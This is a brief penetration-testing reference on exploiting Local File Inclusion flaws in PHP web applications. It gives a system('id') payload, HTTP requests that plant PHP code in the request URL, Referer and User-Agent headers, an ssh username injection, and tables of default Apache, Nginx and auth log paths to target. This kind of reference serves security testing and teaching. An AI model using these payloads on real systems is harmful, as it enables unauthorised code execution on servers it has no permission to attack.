LFI
Local File Inclusion detection and exploitation techniques.
Detection
…
Exploitation
A LFI could allow you to execute arbitrary code by including files not supposed to be interpreted by the web server (s.a. PHP or ASP).
Example:
<?php system('id'); ?>
Upload
If you can find a way to upload your own files to the website, you can simply embed code within it and try to include it with the LFI.
Tip
The file does not have to respect the extension or MIME type of the code you’re trying to embed. For example, if you can only upload images, try to embed code at the end of the image file.
Log Poisoning
Most web servers will log all incoming requests to a local access log file. Logs usually include the requested URL or the Referer header, on which you have control and can try to include arbitrary code.
Example:
GET /<? phpinfo(); ?> HTTP/1.1
Host: vulnerable-website.com
Referer: <? phpinfo(); ?>
Depending on the web server and operating system, logs can be found at the following default locations:
| Path | Web Server | OS |
|---|---|---|
/proc/self/fd/<int> |
ALL | ALL (symlink to the files opened by the running process) |
/var/log/httpd/access_log/var/log/httpd/error_log |
Apache2 | RHEL, CentOS, Fedora |
/var/log/apache2/access.log/var/log/apache2/error.log |
Apache2 | Debian, Ubuntu |
/var/log/httpd-access.log/var/log/httpd-error.log |
Apache2 | FreeBSD |
/var/log/nginx/access.log/var/log/nginx/error.log |
NginX | RHEL, CentOS, Fedora, Debian, Ubuntu |
The same log poisoning technique could also be performed with SSH. However, those logs are usually readable by root only.
Example:
ssh -l '<? phpinfo(); ?>' vulnerable-website.com
| Path | OS |
|---|---|
/var/log/secure |
RHEL, CentOS, Fedora |
/var/log/auth.log |
Debian, Ubuntu, FreeNAS |
User-Agent
For every running process on a Linux host, there is a /proc/self/environ file which contains the environment variables associated to it, including HTTP_USER_AGENT. This means that you can try to embed code and include it by tampering with the User-Agent header.
Example:
GET / HTTP/1.1
Host: vulnerable-website.com
User-Agent: <? phpinfo(); ?>
References
- https://resources.infosecinstitute.com/local-file-inclusion-code-execution/
- https://blog.codeasite.com/how-do-i-find-apache-http-server-log-files/